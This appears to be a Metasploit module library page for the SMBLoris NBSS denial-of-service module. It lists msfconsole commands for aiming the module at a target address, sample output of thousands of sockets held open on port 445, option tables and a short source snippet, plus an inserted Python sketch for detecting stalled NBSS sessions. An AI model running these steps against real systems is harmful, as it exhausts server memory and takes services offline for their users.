SMBLoris NBSS Denial of Service - Metasploit
This page contains detailed information about how to use the auxiliary/dos/smb/smb_loris Metasploit module. For a list of all Metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: SMBLoris NBSS Denial of Service
Module: auxiliary/dos/smb/smb_loris
Source code: modules/auxiliary/dos/smb/smb_loris.rb
Disclosure date: 2017-06-29
Last modification time: 2020-02-25 19:59:27 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: -
Target network port(s): 445
List of CVEs: -
The SMBLoris attack consumes large chunks of memory in the target by sending SMB requests with the NetBIOS Session Service (NBSS) Length Header value set to the maximum possible value. By keeping these connections open and initiating large numbers of these sessions, the memory does not get freed, and the server grinds to a halt. This vulnerability was originally disclosed by Sean Dillon and Zach Harding. DISCLAIMER: This module opens a lot of simultaneous connections. Please check your system's ULIMIT to make sure it can handle it. This module will also run continuously until stopped.
Module Ranking and Traits
Module Ranking:
- normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.
Basic Usage
msf > use auxiliary/dos/smb/smb_loris
msf auxiliary(smb_loris) > show targets
... a list of targets ...
msf auxiliary(smb_loris) > set TARGET target-id
msf auxiliary(smb_loris) > show options
... show and set options ...
msf auxiliary(smb_loris) > exploit
Required Options
- rhost: The target address
Knowledge Base
Vulnerable Application
This module exploits a vulnerability in the NetBIOS Session Service Header for SMB. Any Windows machine with SMB exposed, or any Linux system running Samba, is vulnerable. See the SMBLoris page for details on the vulnerability.
The module opens over 64,000 connections to the target service, so please make sure your system ULIMIT is set appropriately to handle it. A single host running this module can theoretically consume up to 8GB of memory on the target.
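A defender-side sketch of how the stalled sessions described above could be spotted in flow data, added here as an example and not taken from the module or the Metasploit project. It assumes the RFC 1002 NBSS header layout (type, flags with a length-extension bit, 16-bit length) and a hypothetical flow-record format; the thresholds are illustrative.

```python
import struct
from collections import defaultdict

MIN_DECLARED = 0x10000       # assumed threshold: announced length of 64 KiB or more
MIN_IDLE_SECONDS = 30        # assumed: no payload progress for this long
MIN_STALLED_PER_SOURCE = 3   # assumed: kept low for the sample; tune per environment

def parse_nbss_length(first_bytes):
    """Declared payload length from a 4-byte NBSS header (RFC 1002 layout), else None."""
    if len(first_bytes) < 4:
        return None
    msg_type, flags, length = struct.unpack(">BBH", first_bytes[:4])
    if msg_type != 0x00:                      # 0x00 = SESSION MESSAGE
        return None
    return ((flags & 0x01) << 16) | length    # 17-bit length: extension bit + 16 bits

def stalled_sessions(flows):
    """Per source, the declared lengths of sessions that announced a large
    message, delivered less than announced, and then went idle."""
    by_src = defaultdict(list)
    for f in flows:
        declared = parse_nbss_length(f["first_bytes"])
        if declared is None or declared < MIN_DECLARED:
            continue
        if f["payload_bytes"] < declared and f["idle_seconds"] >= MIN_IDLE_SECONDS:
            by_src[f["src"]].append(declared)
    return by_src

def alerts(flows):
    """Sources holding at least MIN_STALLED_PER_SOURCE stalled sessions."""
    return {
        src: {"sessions": len(lens), "declared_bytes": sum(lens)}
        for src, lens in stalled_sessions(flows).items()
        if len(lens) >= MIN_STALLED_PER_SOURCE
    }

# Constructed sample flow records (not captured traffic); field names are hypothetical.
BIG = struct.pack(">BBH", 0x00, 0x01, 0xFFFF)   # announces 131071 bytes
SAMPLE_FLOWS = (
    [{"src": "10.0.0.5", "first_bytes": BIG, "payload_bytes": 0, "idle_seconds": 120}] * 3
    + [
        {"src": "10.0.0.9", "first_bytes": struct.pack(">BBH", 0, 0, 160), "payload_bytes": 160, "idle_seconds": 2},
        {"src": "10.0.0.7", "first_bytes": struct.pack(">BBH", 0, 1, 0x0400), "payload_bytes": 40000, "idle_seconds": 1},
        {"src": "10.0.0.8", "first_bytes": b"\x00\x01", "payload_bytes": 0, "idle_seconds": 300},
    ]
)

if __name__ == "__main__":
    print(alerts(SAMPLE_FLOWS))
```

The `declared_bytes` total is only what the sessions announced, so treat it as an upper bound on what the server may have reserved for that source.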
Verification Steps
- Start msfconsole
- Do: use auxiliary/dos/smb/smb_loris
- Do: set rhost [IP]
- Do: run
- Target should allocate increasing amounts of memory.
Scenarios
msf auxiliary(smb_loris) > use auxiliary/dos/smb/smb_loris
msf auxiliary(smb_loris) > set RHOST 192.168.172.138
RHOST => 192.168.172.138
msf auxiliary(smb_loris) >
msf auxiliary(smb_loris) > run
[*] Starting server...
[*] 192.168.172.138:445 - 100 socket(s) open
[*] 192.168.172.138:445 - 200 socket(s) open
...
[!] 192.168.172.138:445 - At open socket limit with 4000 sockets open. Try increasing you system limits.
[*] 192.168.172.138:445 - Holding steady at 4000 socket(s) open
...
Msfconsole Usage
Here is how the dos/smb/smb_loris auxiliary module looks in the msfconsole:
msf6 > use auxiliary/dos/smb/smb_loris
msf6 auxiliary(dos/smb/smb_loris) > show info
Name: SMBLoris NBSS Denial of Service
Module: auxiliary/dos/smb/smb_loris
License: Metasploit Framework License (BSD)
Rank: Normal
Disclosed: 2017-06-29
Provided by:
thelightcosine
Adam Cammack <adam_cammack[at]rapid7.com>
Check supported:
No
Basic options:
   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   rhost                   yes       The target address
   rport  445              yes       SMB port on the target
Description:
The SMBLoris attack consumes large chunks of memory in the target by
sending SMB requests with the NetBios Session Service(NBSS) Length
Header value set to the maximum possible value. By keeping these
connections open and initiating large numbers of these sessions, the
memory does not get freed, and the server grinds to a halt. This
vulnerability was originally disclosed by Sean Dillon and Zach
Harding. DISCALIMER: This module opens a lot of simultaneous
connections. Please check your system's ULIMIT to make sure it can
handle it. This module will also run continuously until stopped.
References:
http://smbloris.com/
Module Options
This is a complete list of options available in the dos/smb/smb_loris auxiliary module:
msf6 auxiliary(dos/smb/smb_loris) > show options
Module options (auxiliary/dos/smb/smb_loris):
   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   rhost                   yes       The target address
   rport  445              yes       SMB port on the target
Advanced Options
Here is a complete list of advanced options supported by the dos/smb/smb_loris auxiliary module:
msf6 auxiliary(dos/smb/smb_loris) > show advanced
Module advanced options (auxiliary/dos/smb/smb_loris):
   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   VERBOSE    false            no        Enable detailed status messages
   WORKSPACE                   no        Specify the workspace for this module
Auxiliary Actions
This is a list of all auxiliary actions that the dos/smb/smb_loris module can do:
msf6 auxiliary(dos/smb/smb_loris) > show actions
Auxiliary actions:
Name Description
---- -----------
Evasion Options
Here is the full list of possible evasion options supported by the dos/smb/smb_loris auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 auxiliary(dos/smb/smb_loris) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
Error Messages
This module may fail with the following error messages. Check for the possible causes in the code snippets below, taken from the module source code; this can often help in identifying the root cause of the problem.
Exception sending packet: <E.MESSAGE>
Here is a relevant code snippet related to the "Exception sending packet: <E.MESSAGE>" error message:
    rescue Errno::EMFILE
      Metasploit.log "At open socket limit with #{sockets.length} sockets open. Try increasing your system limits.", level: 'warning' unless warned
      warned = true
      sockets.slice(0).close
    rescue Exception => e
      Metasploit.log "Exception sending packet: #{e.message}", level: 'error'
    end
  end
end

if __FILE__ == $PROGRAM_NAME
Related Pull Requests
- #12992 Merged Pull Request: Fix for a simple typo.
- #9748 Merged Pull Request: Externalize SMBLoris
- #8796 Merged Pull Request: SMBLoris Denial of Service Module
References
See Also
Check also the following modules related to this module:
- auxiliary/fuzzers/smb/smb_create_pipe
- auxiliary/fuzzers/smb/smb_create_pipe_corrupt
- auxiliary/fuzzers/smb/smb_negotiate_corrupt
- auxiliary/fuzzers/smb/smb_ntlm1_login_corrupt
- auxiliary/fuzzers/smb/smb_tree_connect
- auxiliary/fuzzers/smb/smb_tree_connect_corrupt
- auxiliary/scanner/smb/smb_enum_gpp
- auxiliary/scanner/smb/smb_enumshares
- auxiliary/scanner/smb/smb_enumusers
- auxiliary/scanner/smb/smb_enumusers_domain
- auxiliary/scanner/smb/smb_login
- auxiliary/scanner/smb/smb_lookupsid
- auxiliary/scanner/smb/smb_ms17_010
- auxiliary/scanner/smb/smb_uninit_cred
- auxiliary/scanner/smb/smb_version
- exploit/windows/smb/smb_delivery
- exploit/windows/smb/smb_doublepulsar_rce
- exploit/windows/smb/smb_relay
- exploit/windows/smb/smb_rras_erraticgopher
- exploit/windows/smb/smb_shadow
- post/linux/busybox/smb_share_root
- auxiliary/dos/windows/smb/ms05_047_pnp
- auxiliary/dos/windows/smb/ms06_035_mailslot
- auxiliary/dos/windows/smb/ms06_063_trans
- auxiliary/dos/windows/smb/ms09_001_write
- auxiliary/dos/windows/smb/ms09_050_smb2_negotiate_pidhigh
- auxiliary/dos/windows/smb/ms09_050_smb2_session_logoff
- auxiliary/dos/windows/smb/ms10_006_negotiate_response_loop
- auxiliary/dos/windows/smb/ms10_054_queryfs_pool_overflow
- auxiliary/dos/windows/smb/ms11_019_electbowser
- auxiliary/dos/windows/smb/rras_vls_null_deref
- auxiliary/dos/windows/smb/vista_negotiate_stop
- auxiliary/dos/http/slowloris
Authors
- thelightcosine
- Adam Cammack <adam_cammack[at]rapid7.com>
Version
This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.